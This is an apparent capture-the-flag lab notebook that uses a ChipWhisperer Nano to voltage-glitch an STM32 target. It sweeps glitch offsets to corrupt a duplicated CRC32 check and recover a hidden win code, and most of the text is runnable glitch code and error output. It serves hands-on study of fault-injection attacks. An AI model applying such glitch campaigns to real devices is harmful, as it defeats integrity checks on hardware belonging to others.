## Generic setup for the CW Nano

In [1]:
SCOPETYPE = 'CWNANO'
PLATFORM = 'CWNANO'
%run "../../../Helper_Scripts/Setup_Generic.ipynb"
scope._cwusb.usbtx.rep = 0x81
scope._cwusb.usbtx.wep = 0x02

INFO: Found ChipWhisperer😍


## Calling The path for the hex file and programming the board.

In [2]:
fw_path = "../err0r-CWNANO.hex"
cw.program_target(scope, cw.programmers.STM32FProgrammer, fw_path)

Detected known STMF32: STM32F04xxx
Extended erase (0x44), this can take ten seconds or more
Attempting to program 5171 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 5171 bytes


Rebooth funtion is needed while injecting faults. If the board fails we rebooth it again.

In [3]:
def reboot_flush():
    scope.io.nrst = False
    time.sleep(0.05)
    scope.io.nrst = "high_z"
    time.sleep(0.05)
    #Flush garbage too
    target.flush()
    

In the c code there is a hash loop. Which compute the crc32 two times. Then it comapres the outputs. Only if both the outputs matches with each other then the output is send out.

However, if the outputs does not match there is a win_code that will be sent out.

We need to find the win_code. The only way is to get the win code is to corrupt crc32 calculations.

There are few scenario:
    1. crc matches crc_2 --> No win_code
    2. crc or/and crc_2 corupted and not matched --> win_code
    3. both crc and crc_2 corrupted and matched --> No win_code
    
Therefore even if we inject the fault through voltage glitch we need to make sure which one is the win code. 
Because we need to take care of scenerio 3 while both calculation is corrupted but matched.

So, we inject the fault multiple times and record the outputs that does not matches with the good output. 

Then perform the intersetion to find the correct win_code.

In [5]:
from tqdm.notebook import tqdm, trange
import matplotlib.pyplot as plt
import numpy as np
win_codes=[[],[],[],[],[]]

for m in trange (0, 5):
    msg = bytearray([m]*8) #simpleserial uses bytearrays
    #print(msg)

    target.simpleserial_write('h',msg)
    good_output=target.simpleserial_read('r', 4)
    #print("Good output:", list(good_output))

    for repeat in range (1,2):
        for offset in trange (1,300): 
            scope.glitch.repeat =repeat
            scope.glitch.ext_offset =offset        

            try:
                scope.arm()
                target.simpleserial_write('h',msg)
                ret = scope.capture()
                out_arr=target.simpleserial_read('r', 4)

                if (out_arr != good_output):
                    #print("Winner Code:", list(out_arr))
                    #print('Repeat : %d, offset:  %d, i: %d' %(repeat, offset, i))
                    win_codes[m].append(str(list(out_arr)))
            except:
                #print('Broken')
                reboot_flush()
    
print("All Corrupted output: ", win_codes)  


  0%|          | 0/5 [00:00<?, ?it/s]

  0%|          | 0/299 [00:00<?, ?it/s]

ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack


ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack


ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack


...

ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack


ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack


ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target 

ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack
ERROR:ChipWhisperer Target:Target did not ack


All Corrupted output:  [['[94, 152, 132, 31]', '[94, 152, 132, 31]', '[87, 73, 78, 33]', '[87, 73, 78, 33]', '[87, 73, 78, 33]', '[11, 141, 245, 124]', '[11, 141, 245, 124]', '[7, 225, 36, 0]', '[7, 225, 36, 0]', '[7, 225, 36, 0]', '[7, 225, 36, 0]', '[7, 225, 36, 0]', '[7, 225, 36, 0]', '[7, 225, 36, 0]', '[7, 225, 36, 0]', '[7, 225, 36, 0]', '[7, 225, 36, 0]', '[247, 223, 136, 169]', '[87, 73, 78, 33]', '[247, 223, 136, 169]', '[87, 73, 78, 33]', '[51, 255, 242, 44]', '[51, 255, 242, 44]', '[247, 223, 136, 169]', '[247, 223, 136, 169]', '[247, 223, 136, 169]', '[87, 73, 78, 33]', '[87, 73, 78, 33]', '[39, 22, 56, 140]', '[247, 223, 136, 169]', '[247, 223, 136, 169]', '[87, 73, 78, 33]', '[247, 223, 136, 169]', '[175, 85, 209, 5]', '[175, 85, 209, 5]', '[175, 85, 209, 5]', '[175, 85, 209, 5]', '[175, 85, 209, 5]', '[146, 184, 52, 17]', '[175, 85, 209, 5]', '[175, 85, 209, 5]', '[168, 50, 209, 23]', '[168, 50, 209, 23]', '[168, 50, 209, 23]', '[168, 50, 209, 23]'], ['[87, 73, 78, 33]',

Intersection of all corrupted output for multiple inputs--> outputs are done such that we can find the win_code only.

## We found: [87, 73, 78, 33]

In [6]:
intersection = set.intersection(set(win_codes[0]), set(win_codes[1]), set(win_codes[2]), set(win_codes[3]), set(win_codes[4]))
print("Correct Winner code", str(intersection)[2:-2])


Correct Winner code [87, 73, 78, 33]
